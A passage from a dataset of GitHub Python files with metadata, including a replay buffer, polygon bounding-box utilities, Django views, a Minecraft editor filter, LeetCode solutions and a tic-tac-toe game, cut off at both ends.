int(input())\nprint(is_leap(year))\n","repo_name":"ikramawol/21-day-challenge-for-python","sub_path":"leep_year.py","file_name":"leep_year.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13907200665","text":"import networkx as nx\nimport numpy as np\nimport random as rd\nimport operator as op\nimport graphgenerator as gg\n\n\n\n\nvar1=[]\ngseq1=[]\nnum1=np.zeros(12)\nfor i in range(12):\n seq=[]\n for j in range(10):\n a=rd.randint(1,9)\n seq.append(a)\n dic=gg.list_to_dic(seq)\n try:\n g1=gg.heat_heter_graph(dic)\n if not(nx.is_connected(g1)):\n num1[i]=1\n except:\n num1[i]=2\n g1=nx.complete_graph(10)\n temp1=gm.Temp_var(g1)\n var1.append(temp1)\n","repo_name":"shaolintan/Evolutionary-Games-on-Complex-Networks","sub_path":"Pairwise interaction games/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"16658871601","text":"import numpy as np\nfrom game import Map\n\nclass ReplayBuffer():\n def __init__(self, frameHeight, frameWidth, maxSize, historyLength, batchSize):\n self.historyLength = historyLength\n self.current = 0\n self.currentSize = 0\n self.maxSize = maxSize\n self.batchSize = batchSize\n self.frameHeight = frameHeight\n self.frameWidth = frameWidth\n\n self.frames = np.zeros((maxSize, self.frameHeight, self.frameWidth), dtype=np.uint8)\n self.actions = np.zeros(maxSize, dtype=np.int32)\n self.rewards = np.zeros(maxSize, dtype=np.int32)\n self.done = np.zeros(maxSize, dtype=np.bool)\n\n self.states = np.empty((self.batchSize, self.historyLength, \n self.frameHeight, self.frameWidth), dtype=np.uint8)\n self.new_states = np.empty((self.batchSize, self.historyLength, \n self.frameHeight, self.frameWidth), dtype=np.uint8)\n self.indices = np.empty(self.batchSize, dtype=np.int32)\n\n def add_experience(self, frame, action, reward, done):\n self.frames[self.current] = frame\n self.actions[self.current] = action\n self.rewards[self.current] = reward\n self.done[self.current] = done\n\n self.current = (self.current+1) % self.maxSize\n self.currentSize = min(self.currentSize+1, self.maxSize)\n\n def get_random_index(self):\n while True:\n idx = np.random.randint(self.historyLength, self.currentSize - 1)\n if idx < self.historyLength + 1:\n continue\n if idx >= self.current and idx - self.historyLength <= self.current:\n continue\n if self.done[idx - self.historyLength:idx].any():\n continue\n break\n return idx\n\n def sample_batch(self):\n if self.currentSize < self.historyLength:\n raise ValueError('Not enough memories to get a minibatch')\n\n for i in range(self.batchSize):\n idx = self.get_random_index()\n self.indices[i] = idx\n\n for i, idx in enumerate(self.indices):\n self.states[i] = self.get_state(idx - 1)\n self.new_states[i] = self.get_state(idx)\n\n return self.states, \\\n self.actions[self.indices], \\\n self.rewards[self.indices], \\\n self.new_states, \\\n self.done[self.indices]\n \n def get_state(self, index):\n if index > self.historyLength - 1:\n return self.frames[index - self.historyLength+1:index+1, ...]\n ","repo_name":"chenalan02/BulletDodge-RL","sub_path":"replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"23750348944","text":"# from logging import root\nfrom tkinter import *\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\n\n# Create simple linear regression model for sequence prediction\ndata=[i for i in range(101)]\nx=[]\ny=[]\n\nfor i in range(len(data)):\n end=i+1\n if end>=len(data):break\n x.append(data[i:end])\n y.append(data[end])\n\nx=np.array(x)\ny=np.array(y)\n\n# Tkinter GUI for for fresh predictions\nmodel=LinearRegression()\nmodel.fit(x,y)\nroot=Tk()\n\nroot.geometry('500x200')\nroot.configure(bg='pink')\n\nroot.title('A Dirty Simple Linear regression')\n\n# Integer Input\nnum=IntVar()\nent=Entry(root,textvariable=num,justify='center',font='Stencil_Std 13')\nent.grid(column=0,row=0,columnspan=2,rowspan=2,sticky='NSEW')\n\n# Entry Label\nlab_ent=Label(root)\nlab_ent.grid(column=3,row=0,columnspan=2,rowspan=2)\nlab_ent.config(background='Blue',foreground=\"black\",text=\"Enter the value to predict\",font=('Bold'))\n\n# Label to display the prediction\nlab=Label(root)\nlab.grid(column=0,row=3,columnspan=2,rowspan=2,sticky='NSEW')\n\n# Label to display Prediction\nlab_ent=Label(root)\nlab_ent.grid(column=3,row=3,columnspan=2,rowspan=2,sticky='NSEW')\nlab_ent.config(background='Blue',foreground=\"black\",text=\"The Predicted Value\",font=('Bold'),borderwidth=5,border=2)\n\n\ndef l(event):\n value=num.get()\n predict=model.predict(np.array(value).reshape(1,-1))\n print(predict)\n lab.config(text=round(predict[0],1),background='yellow',font=('Bold'))\n\nent.bind('',l)\n# def lab_value(event):\n# lab.set\n \n\nroot.mainloop()","repo_name":"slmsshk/Data_Science-_Dummy","sub_path":"SLR/Dirty_SLR.py","file_name":"Dirty_SLR.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"17165328476","text":"# MCEdit filter created by TheDestruc7i0n\n# http://youtube.com/TheDestruc7i0n\n\nfrom pymclevel import TAG_List\nfrom pymclevel import TAG_Byte\nfrom pymclevel import TAG_Int\nfrom pymclevel import TAG_Compound\nfrom pymclevel import TAG_Short\nfrom pymclevel import TAG_Double\nfrom pymclevel import TAG_String\n\ndisplayName = \"1.7 CTI\"\n\ndef fixedString(s):\n\tchars = list(s)\n\tpref = []\n\tnewStr = \"\"\n\tformat = unichr(167)\n\t\n\ti = 0\n\tfor c in chars:\n\t\tif c == \"&\":\n\t\t\tif chars[i+1] != \"r\":\n\t\t\t\tpref.append(chars[i+1])\n\t\t\telse:\n\t\t\t\tpref = [\"r\"]\n\t\t\tdel(chars[i+1])\n\t\telif c != \" \":\n\t\t\tfor code in pref:\n\t\t\t\tnewStr += format + code\n\t\t\tx = 0\n\t\t\tfor cd in pref:\n\t\t\t\tif cd == \"r\":\n\t\t\t\t\tdel(pref[x])\n\t\t\t\tx += 1\n\t\t\t\t\t\n\t\t\t\t\n\t\t\tnewStr += c\n\t\telse:\n\t\t\tnewStr += c\n\t\t\n\t\ti += 1\n\t\t\n\treturn newStr\n\t\t\t\n\t\t\n\t\n\t\t\t\ndef perform(level, box, options):\n\tfor (chunk, slices, point) in level.getChunkSlices(box):\n\t\tfor e in chunk.Entities:\n\t\t\tx = e[\"Pos\"][0].value\n\t\t\ty = e[\"Pos\"][1].value\n\t\t\tz = e[\"Pos\"][2].value\n\t\t\t\n\t\t\tif x >= box.minx and x < box.maxx and y >= box.miny and y < box.maxy and z >= box.minz and z < box.maxz:\n\t\t\t\tif e[\"id\"].value == \"MinecartCommandBlock\":\n\t\t\t\t\t\tcmd = e[\"Command\"].value\n\t\t\t\t\t\tnewcmd = fixedString(cmd)\n\t\t\t\t\t\tif newcmd != cmd:\n\t\t\t\t\t\t\te[\"Command\"] = TAG_String(newcmd)\n\t\t\t\t\t\t\tchunk.dirty = True\n\t\t\t\t\t\t\t\n\t\tfor t in chunk.TileEntities:\n\t\t\tx = t[\"x\"].value\n\t\t\ty = t[\"y\"].value\n\t\t\tz = t[\"z\"].value\n\t\t\t\t\n\t\t\tif x >= box.minx and x < box.maxx and y >= box.miny and y < box.maxy and z >= box.minz and z < box.maxz:\n\t\t\t\tif t[\"id\"].value == \"Sign\":\n\t\t\t\t\tfor l in range(1, 5):\n\t\t\t\t\t\tline = t[\"Text\" + str(l)].value\n\t\t\t\t\t\tnewline = fixedString(line)\n\t\t\t\t\t\tif line != newline:\n\t\t\t\t\t\t\tt[\"Text\" + str(l)] = TAG_String(newline)\n\t\t\t\t\t\t\tchunk.dirty = True\n\t\t\t\tif t[\"id\"].value == \"Control\":\n\t\t\t\t\tcmd = t[\"Command\"].value\n\t\t\t\t\tnewcmd = fixedString(cmd)\n\t\t\t\t\tif newcmd != cmd:\n\t\t\t\t\t\tt[\"Command\"] = TAG_String(newcmd)\n\t\t\t\t\t\tchunk.dirty = True\n","repo_name":"destruc7i0n/TDMCEditFilters","sub_path":"17CTI.py","file_name":"17CTI.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44789457739","text":"\"\"\"\n给你一个会议时间安排的数组 intervals ,每个会议时间都会包括开始和结束的时间 intervals[i] = [starti, endi] ,为避免会议冲突,同时要考虑充分利用会议室资源,请你计算至少需要多少间会议室,才能满足这些会议安排。\n\n \n\n示例 1:\n\n输入:intervals = [[0,30],[5,10],[15,20]]\n输出:2\n示例 2:\n\n输入:intervals = [[7,10],[2,4]]\n输出:1\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/meeting-rooms-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\"\"\"\nimport heapq\nfrom typing import List\n\n# 2021.03.04 直奔题解的一天\n# 利用最小堆\nclass Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n\n # If there is no meeting to schedule then no room needs to be allocated.\n if not intervals:\n return 0\n\n # The heap initialization\n free_rooms = []\n\n # Sort the meetings in increasing order of their start time.\n intervals.sort(key= lambda x: x[0])\n\n # Add the first meeting. We have to give a new room to the first meeting.\n heapq.heappush(free_rooms, intervals[0][1])\n\n # For all the remaining meeting rooms\n for i in intervals[1:]:\n\n # If the room due to free up the earliest is free, assign that room to this meeting.\n if free_rooms[0] <= i[0]:\n heapq.heappop(free_rooms)\n\n # If a new room is to be assigned, then also we add to the heap,\n # If an old room is allocated, then also we have to add to the heap with updated end time.\n heapq.heappush(free_rooms, i[1])\n\n # The size of the heap tells us the minimum rooms required for all the meetings.\n return len(free_rooms)\n\n# 时间复杂度:O(NlogN) 。时间开销主要有两部分。第一部分是数组的 排序 过程,消耗 (NlogN) 的时间。数组中有 NN 个元素。\n# 接下来是 最小堆 占用的时间。在最坏的情况下,全部 NN 个会议都会互相冲突。在任何情况下,我们都要向堆执行 NN 次插入操作。在最坏的情况下,我们要对堆进行 NN 次查找并删除最小值操作。总的时间复杂度为 (NlogN),因为查找并删除最小值操作只消耗 O(logN) 的时间。\n# 空间复杂度:O(N) 。额外空间用于建立 最小堆 。在最坏的情况下,堆需要容纳全部 NN 个元素。因此空间复杂度为 O(N) 。\n\n# 2021.03.20 磕磕绊绊,总算写出来了\nclass Solution1:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n intervals.sort(key=lambda x: x[0])\n arr = [intervals[0][1]]\n heapq.heapify(arr)\n for i in intervals[1:]:\n if i[0] >= arr[0]:\n heapq.heappop(arr)\n heapq.heappush(arr, i[1])\n \n return len(arr)","repo_name":"ZhiyuSun/leetcode-practice","sub_path":"201-300/253_会议室II.py","file_name":"253_会议室II.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"28387726027","text":"import numpy as np\nfrom numpy.linalg import norm\nfrom shapely.plotting import plot_polygon\nfrom shapely import Point, Polygon\nimport matplotlib.pyplot as plt\nimport re\n\n\n\ndef point_is_inside_polygon(point: Point, polygon: Polygon) -> bool:\n \"\"\"function to check if a point lies inside a polygon\n\n Args:\n point (Point): point to check\n polygon (Polygon): polygon being checked against\n\n Returns:\n bool: returns true if point is inside polygon; returns false if point is outside polygon\n \"\"\" \n point = Point(point) \n polygon = Polygon(polygon)\n print('point is inside polygon: ', point.within(polygon))\n return point.within(polygon)\n\n\n\ndef polygon_is_valid(vertices: np.array) -> bool:\n \"\"\"function to check if a polygon is valid\n\n Args:\n vertices (np.array): polygon vertices being checked\n\n Returns:\n bool: returns true if polygon is a valid polygon; returns false if it is an invalid polygon (has less than 3 vertices or self-intersects)\n \"\"\" \n n = len(vertices)\n if n < 3:\n print('valid: False')\n return False\n \n # loop to iterate over each vertex of the polygon\n for i in range(n):\n # variable for the current vertex in the loop\n p1 = vertices[i]\n # variable for the next vertex in the loop\n p2 = vertices[(i + 1) % n]\n # nested loop to iterate over the remaining vertices in the polygon\n for j in range(i + 2, n + i - 1):\n # variable for the current vertex in the nested loop\n p3 = vertices[j % n]\n # variable for the next vertex in the nested loop\n p4 = vertices[(j + 1) % n]\n # check if current edge intersects with another edge in the polygon\n if intersect(p1, p2, p3, p4):\n print('valid: False')\n return False\n print('valid: True')\n return True\n\n\n\ndef intersect(p1: np.array, p2: np.array, p3: np.array, p4: np.array) -> bool:\n \"\"\"function to check if the lines intersect\n\n Args:\n p1 (np.array): first point checked\n p2 (np.array): second point checked\n p3 (np.array): third point checked\n p4 (np.array): fourth point checked\n\n Returns:\n bool: returns true if the lines intersect; returns false if they do not intersect\n \"\"\" \n # calculates the determinant of a matrix formed by two vectors, which is used to check if the two lines formed by the points intersect\n d = (p4[1] - p3[1]) * (p2[0] - p1[0]) - (p4[0] - p3[0]) * (p2[1] - p1[1])\n # if lines don't intersect, return false\n if d == 0:\n return False\n # check if the lines intersect\n u = ((p3[0] - p1[0]) * (p2[1] - p1[1]) - (p3[1] - p1[1]) * (p2[0] - p1[0])) / d\n v = ((p3[0] - p1[0]) * (p4[1] - p3[1]) - (p3[1] - p1[1]) * (p4[0] - p3[0])) / d\n # returns true if the lines intersect (if both 'u' and 'v' are between 0 and 1)\n return (u >= 0) and (v >= 0) and (u <= 1) and (v <= 1)\n\n\n\ndef create_module(l: float, w: float, a_hat: np.array, pos: np.array) -> Polygon:\n \"\"\"function that generates rectangular polygon with a given orientation\n\n Args:\n l (float): length of polygon\n w (float): width of polygon\n a_hat (np.array): alignment vector\n pos (np.array): starting position of the polygon (its bottom left corner)\n\n Returns:\n Polygon: returns a polygon created using the entered length, width, alignment, and starting position\n \"\"\" \n rotated_a_hat = np.array([-a_hat[1], a_hat[0]])\n a_hat_string = str(a_hat)\n a_hat_split_string = re.findall('[0-9]', a_hat_string)\n a_hat_split = (int(a_hat_split_string[0]), int(a_hat_split_string[1]))\n bottom_left = np.array(pos)\n # if a_hat is horizontal (on x-axis (1,0))\n if (a_hat_split[1] == 0 and a_hat_split[0] != 0):\n bottom_right = pos + np.array(a_hat) * w\n top_left = pos + np.array(rotated_a_hat) * l\n top_right = pos + (np.array(rotated_a_hat) * l) + (np.array(a_hat) * w)\n # if a_hat is vertical (on y-axis (0,1))\n if (a_hat_split[0] == 0 and a_hat_split[1] != 0):\n bottom_right = pos + np.array(rotated_a_hat) * l\n top_left = pos + np.array(a_hat) * w\n top_right = pos + (np.array(a_hat) * w) + (np.array(rotated_a_hat) * l)\n # if a_hat is diagonal\n if (a_hat_split[0] != 0 and a_hat_split[1] != 0):\n bottom_right = pos + np.array(a_hat) * w\n top_right = bottom_right + np.array(rotated_a_hat) * l\n top_left = pos + np.array(rotated_a_hat) * l\n # add each vertex to the module\n module_list = [bottom_left.tolist(), bottom_right.tolist(), top_right.tolist(), top_left.tolist()]\n module = Polygon(module_list)\n print(module)\n return module\n\n\n\ndef poly1_inside_poly2(p1: Polygon, p2: Polygon) -> bool:\n \"\"\"function to check if a polygon (p1) is inside of another polygon (p2)\n\n Args:\n p1 (Polygon): inside polygon\n p2 (Polygon): outside polygon\n\n Returns:\n bool: returns true if p1 is inside p2\n \"\"\" \n p1 = Polygon(p1)\n p2 = Polygon(p2)\n p1_points = p1.exterior.coords[:]\n for vertex in p1_points:\n if not point_is_inside_polygon(vertex, p2):\n print('poly1 inside poly2: False')\n return False\n print('poly1 inside poly2: True')\n return True\n\n\n\ndef rotate_polygon(a_hat: np.array, vector: np.array, polygon: Polygon) -> Polygon:\n \"\"\"function to rotate the polygon (R) based on the angle between the alignment vector and another vector (x or y axis)\n\n Args:\n polygon (Polygon): polygon (R) to be rotated\n\n Returns:\n Polygon: returns a rotated polygon\n \"\"\" \n dot_product = np.dot(a_hat, vector)\n cosine = dot_product/(norm(a_hat)*norm(vector))\n rotated_polygon = []\n print('dot product:', dot_product)\n print('cosine:', cosine)\n polygon = Polygon(polygon)\n points = polygon.exterior.coords[:]\n for point in points:\n xr = (point[0]*np.cos(cosine)) - (point[1]*np.sin(cosine))\n yr = (point[0]*np.sin(cosine)) + (point[1]*np.cos(cosine))\n rot_matrix = (xr, yr)\n print('rotated matrix:', rot_matrix)\n rotated_polygon.append(rot_matrix)\n print('rotated polygon:', rotated_polygon)\n return rotated_polygon\n\n\n\ndef reverse_rotate_polygon(a_hat: np.array, vector: np.array, polygon: Polygon) -> Polygon:\n \"\"\"rotates polygon (basic bounding box) to original orientation (of polygon (R) inside bounding box)\n\n Args:\n polygon (Polygon): polygon to be rotated back (basic bounding box)\n\n Returns:\n Polygon: returns a polygon (bounding box) oriented along alignment vector\n \"\"\" \n dot_product = np.dot(a_hat, vector)\n cosine = -(dot_product/(norm(a_hat)*norm(vector)))\n reverse_rotated_polygon = []\n print('dot product:', dot_product)\n print('cosine:', cosine)\n polygon = Polygon(polygon)\n points = polygon.exterior.coords[:]\n for point in points:\n xr = (point[0]*np.cos(cosine)) - (point[1]*np.sin(cosine))\n yr = (point[0]*np.sin(cosine)) + (point[1]*np.cos(cosine))\n rot_matrix = (xr, yr)\n print('reverse rotated matrix:', rot_matrix)\n reverse_rotated_polygon.append(rot_matrix)\n print('reverse rotated polygon:', reverse_rotated_polygon)\n return reverse_rotated_polygon\n\n\n\ndef find_bbox_basic(points: Polygon) -> Polygon:\n \"\"\"function to find the basic bounding box with either x or y axis alignment\n\n Args:\n points (np.array): polygon points used to create the bounding box\n\n Returns:\n Polygon: returns a basic bounding box for rotated polygon (rotated R)\n \"\"\" \n x_coords, y_coords = zip(*points)\n basic_case_bbox = Polygon([(min(x_coords), max(y_coords)), (max(x_coords), max(y_coords)), (max(x_coords), min(y_coords)), (min(x_coords), min(y_coords))])\n print(basic_case_bbox)\n return basic_case_bbox\n\n\n\ndef find_bbox(a_hat: np.array, vector: np.array, polygon: Polygon) -> Polygon:\n \"\"\"function to find the smallest box (bounding box) to contain polygon (R) based on alignment vector\n\n Args:\n a_hat (np.array): alignment vector\n R (Polygon): polygon to be bounded\n\n Returns:\n Polygon: returns a bounding box for polygon (R)\n \"\"\"\n a_hat = np.array(a_hat)\n vector = np.array(vector)\n polygon = Polygon(polygon)\n rotated_R = rotate_polygon(a_hat, vector, polygon)\n basic_bbox = find_bbox_basic(rotated_R)\n bbox = Polygon(reverse_rotate_polygon(a_hat, vector, basic_bbox))\n print('bbox:', bbox)\n return bbox\n\n\ndef run_test_cases(func, *args, **kwargs):\n polygon = func(*args, **kwargs)\n plot_polygon(polygon)\n return plt.show()\n\n \n\na_hat = [1, 1]\nvector = [1, 0]\nR = [(0, 2.5), (0.5, 2), (1, 1.75), (1.5, 1.5), (2, 1), (1.5, 3)]\nbbox = find_bbox(a_hat, vector, R)\nrun_test_cases(find_bbox, a_hat, vector, R)\n\nl = 2\nw = 1\npos = [1.5, 1.5]\nmodule1 = create_module(l, w, a_hat, pos)\nrun_test_cases(create_module, l, w, a_hat, pos)\npoly1_inside_poly2(module1, R)\n\nl = 0.5\nw = 0.25\npos = [1.25, 2]\nmodule2 = create_module(l, w, a_hat, pos)\nrun_test_cases(create_module, l, w, a_hat, pos)\npoly1_inside_poly2(module2, R)\n","repo_name":"skellikass/ArrayLayoutEnginePython","sub_path":"ArrayLayoutEngine.py","file_name":"ArrayLayoutEngine.py","file_ext":"py","file_size_in_byte":9200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73972490567","text":"import bisect\r\nc = int(input())\r\nfor x in range(c):\r\n n,w = str(input()).split()\r\n w = int(w)\r\n r = str(input()).split()\r\n lista = [None] * len(r)\r\n for i in range(len(r)):\r\n lista[i] = int(r[i])\r\n lista = sorted(lista)\r\n a = 1\r\n come = w\r\n while len(lista) != 0:\r\n z = (bisect.bisect_right(lista, come, hi=len(lista)))\r\n if(z < 1):\r\n come = w\r\n a+= 1\r\n else:\r\n z -= 1\r\n v = lista[z]\r\n come -= v\r\n lista.pop(z)\r\n print(a)","repo_name":"arturbs/algoritmos-Avancados","sub_path":"lista 4 iniciante/C - Box Fitting.py","file_name":"C - Box Fitting.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8807770169","text":"\"\"\".. _plot_spheres_example:\n\nScaled Gaussian Points\n----------------------\nThis example demonstrates how to plot spheres using the ``'points_gaussian'``\nstyle and scale them by a dynamic radius.\n\n\"\"\"\n\nimport numpy as np\n\nimport pyvista as pv\n\n# sphinx_gallery_start_ignore\n# gaussian does not work in VTK.js\nPYVISTA_GALLERY_FORCE_STATIC_IN_DOCUMENT = True\n# sphinx_gallery_end_ignore\n\n###############################################################################\n# First, generate the sphere positions and radii randomly on the edge of a\n# torus.\n\nN_SPHERES = 10_000\ntheta = np.random.default_rng().uniform(0, 2 * np.pi, N_SPHERES)\nphi = np.random.default_rng().uniform(0, 2 * np.pi, N_SPHERES)\ntorus_radius = 1\ntube_radius = 0.3\nradius = torus_radius + tube_radius * np.cos(phi)\nrad = np.random.default_rng().random(N_SPHERES) * 0.01\n\npos = np.zeros((N_SPHERES, 3))\npos[:, 0] = radius * np.cos(theta)\npos[:, 1] = radius * np.sin(theta)\npos[:, 2] = tube_radius * np.sin(phi)\n\n\n###############################################################################\n# Next, create a PolyData object and add the sphere positions and radii as\n# data arrays.\n\npdata = pv.PolyData(pos)\npdata['radius'] = rad\n\n\n###############################################################################\n# Finally, plot the spheres using the ``points_gaussian`` style and scale them\n# by radius.\n\npl = pv.Plotter()\nactor = pl.add_mesh(\n pdata,\n style='points_gaussian',\n emissive=False,\n render_points_as_spheres=True,\n show_scalar_bar=False,\n)\nactor.mapper.scale_array = 'radius'\npl.camera.zoom(1.5)\npl.show()\n\n\n###############################################################################\n# Show the same plot with ``emissive=True``.\n\npl = pv.Plotter()\npl.background_color = 'k'\nactor = pl.add_mesh(\n pdata,\n style='points_gaussian',\n emissive=True,\n render_points_as_spheres=True,\n show_scalar_bar=False,\n)\nactor.mapper.scale_array = 'radius'\npl.camera.zoom(1.5)\npl.show()\n","repo_name":"user27182/pyvista","sub_path":"examples/02-plot/points-gaussian-scale.py","file_name":"points-gaussian-scale.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"74750531209","text":"from django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\n\nfrom django.shortcuts import render_to_response\nfrom django.contrib.flatpages.models import FlatPage\n\n# Create your views here.\n\n# The following is the old search method that performs a query of flatpages\n#from django.template import loader, Context\n#def search(request):\n# query = request.GET['q']\n# results = FlatPage.objects.filter(content__icontains=query)\n# template = loader.get_template('search/search.html')\n# contetxt = Context({ 'query': query, 'results': results })\n# response = template.reder(context)\n# return HttpResponse(response)\n \ndef search(request):\n # return query from the submitted form, if no value set default value, empty string\n query = request.GET.get('q', '')\n keyword_results = results = []\n if query:\n keyword_results = FlatPage.objects.filter(searchkeyword__keyword__in=query.split()).distinct()\n if keyword_results.count() == 1:\n return HttpResponseRedirect(keyword_results[0].get_absolute_url())\n results = FlatPage.objects.filter(content__icontains=query)\n return render_to_response('search/search.html',\n { 'query': query,\n 'keyword_results': keyword_results,\n 'results': results })","repo_name":"jrjsb4/CMS---Web-Log---Code-Snippets","sub_path":"cms/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"29516748618","text":"from django.shortcuts import render, redirect\nfrom .forms import DateRangeForm\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\nfrom io import BytesIO\nimport base64\n\ndef Home(request):\n if request.method == 'POST':\n form = DateRangeForm(request.POST)\n if form.is_valid():\n form.save() \n print(\"Start Date\", form.cleaned_data['start_date'])\n print(\"End Date\", form.cleaned_data['end_date'])\n current_directory = os.path.dirname(os.path.abspath(__file__))\n pickle_file_path = os.path.join(current_directory, 'model_sarimax_fit1.pkl')\n model_path = pickle_file_path\n with open(model_path, 'rb') as file:\n loaded_model = pickle.load(file)\n start=form.cleaned_data['start_date']\n end=form.cleaned_data['end_date']\n predictions=loaded_model.predict(start,end)\n print(predictions) \n \n # Create a Matplotlib plot\n plt.figure(figsize=(12, 6))\n plt.plot(predictions, label='SARIMA Predictions', linestyle='--', color='red', marker='o')\n plt.xlabel('Date')\n plt.ylabel('Sales')\n plt.title('SARIMA Predictions')\n plt.grid(True)\n\n # Save the plot as a BytesIO object\n buffer = BytesIO()\n plt.savefig(buffer, format='png')\n buffer.seek(0)\n plt.close()\n\n # Convert the BytesIO object to base64 for embedding in HTML\n plot_data = base64.b64encode(buffer.read()).decode('utf-8')\n \n return render(request, 'Home/index.html', {'form': form, 'plot_data': plot_data}) # Redirect to a success page\n else:\n form = DateRangeForm()\n \n return render(request, 'Home/index.html', {'form': form})\n","repo_name":"Deybabu/Django-Champane-DataSet","sub_path":"AirPassanger/Home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14827215448","text":"# Criar o jogo “JOGO DA VELHA”\n# a) Serão dois jogadores\n# b) O jogo pergunta onde você quer jogar e alternar entre os dois jogadores.\n# c) A cada jogada, verifique se a posição esta livre.\n# d) Apresentar no final se teve empate e/ou quem foi o jogador vencedor.\n# Exemplo do jogo:\n# X | 0 |\n# ---+---+---\n# | X | X\n# ---+---+---\n# | | 0\n\n# Exemplo das posições mapeadas para ajudar:\n# 7 | 8 | 9\n# ---+---+---\n# 4 | 5 | 6\n# ---+---+---\n# 1 | 2 | 3\n\nimport time\n\ndef menu():\n print('BEM VINDO(A) AO JOGO DA VELHA')\n time.sleep(1)\n iniciar = 1\n while iniciar:\n iniciar = int(input('O que você deseja fazer? 1 - Jogar ou 0 - Sair \\n'))\n time.sleep(1)\n\n if iniciar:\n jogar()\n else:\n print('Até a próxima!')\n\n\ntabuleiro = [[0,0,0],\n [0,0,0],\n [0,0,0]]\n\ndef exibeTabuleiro():\n for i in range(3):\n for j in range(3):\n if tabuleiro[i][j] == 0:\n print('_', end=' ')\n elif tabuleiro[i][j] == 1:\n print('X', end=' ')\n elif tabuleiro[i][j] == -1:\n print('O', end=' ')\n print()\n\ndef ganhou():\n for i in range(3):\n soma = tabuleiro[i][0] + tabuleiro[i][1] + tabuleiro[i][2]\n if soma == 3 or soma == -3:\n return True\n \n for j in range(3):\n soma = tabuleiro[0][j] + tabuleiro[1][j] + tabuleiro[2][j]\n if soma == 3 or soma == -3:\n return True\n\n diagonal1 = tabuleiro[0][0] + tabuleiro[1][1] + tabuleiro[2][2]\n diagonal2 = tabuleiro[2][0] + tabuleiro[1][1] + tabuleiro[0][2]\n if diagonal1 == 3 or diagonal1 == -3 or diagonal2 == 3 or diagonal2 == -3:\n return True\n \n return False\n\ndef jogar():\n jogadas = 0\n print('Esse é o gabarito de posições:')\n print(' 1 2 3\\n 4 5 6 \\n 7 8 9')\n global tabuleiro \n tabuleiro = [[0,0,0],\n [0,0,0],\n [0,0,0]]\n \n while not ganhou():\n if jogadas == 9:\n print('Os jogadores empataram.')\n break\n print('\\nJogador ', jogadas % 2 + 1)\n print('--------------')\n exibeTabuleiro()\n posicao = int(input('\\nEm qual posição deseja jogar? [1 a 9]:'))\n linha = (posicao - 1) // 3\n coluna = (posicao -1) % 3\n if tabuleiro[linha][coluna] == 0:\n if(jogadas % 2 + 1)== 1:\n tabuleiro[linha][coluna] = 1\n else:\n tabuleiro[linha][coluna] = -1\n else:\n print('Essa posição não está livre')\n jogadas -= 1\n\n if ganhou():\n print('O jogador ',jogadas % 2 + 1,' ganhou!')\n print('Parabéns!')\n\n jogadas +=1\n\nmenu()","repo_name":"kellina/python","sub_path":"jogo-da-velha/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"957411352","text":"import os\nimport traceback\n\nimport pika\nimport psycopg2\n\nfrom pika.adapters.blocking_connection import BlockingChannel\nfrom cerberus import validator\nfrom typing import List\nimport json\nimport logging\n\nlog = logging.getLogger()\nlogging.basicConfig(level=logging.WARNING)\n\n\ndef provide_amqp(amqp_url) -> BlockingChannel:\n if not hasattr(provide_amqp, '_conn'):\n provide_amqp._conn = pika.BlockingConnection(pika.URLParameters(amqp_url))\n provide_amqp._channel = provide_amqp._conn.channel()\n\n return provide_amqp._channel\n\n\ndef provide_db(db_dsn: str):\n if not hasattr(provide_db, '_conn'):\n provide_db._conn = psycopg2.connect(db_dsn)\n\n table_sql = \"\"\"\n create table if not exists events (\n ts timestamp, \n payload TEXT,\n queue TEXT,\n success boolean,\n error TEXT\n )\n \"\"\"\n with provide_db._conn:\n with provide_db._conn.cursor() as cur:\n cur.execute(table_sql)\n\n return provide_db._conn\n\n\ndef send_messages_handler(channel: BlockingChannel, db_conn, request):\n schema = {\n 'payload': {'type': 'string', 'required': True},\n 'routing_keys': {'type': 'list', 'required': True, 'schema': {\n 'type': 'string'\n }}\n }\n\n v = validator.Validator(schema, allow_unknown=True)\n if not v.validate(request):\n raise ValueError('Invalid request: {}'.format(v.errors))\n\n payload = request['payload'] # type: str\n routing_keys = request['routing_keys'] # type: List[str]\n\n success_count = 0\n failed_count = 0\n insert_data = []\n for rk in routing_keys:\n try:\n channel.basic_publish('', rk, payload.encode('utf-8'))\n insert_data.append((payload, rk, True, None))\n success_count += 1\n except:\n log.exception('Failed to publish msg to queue %s', rk)\n 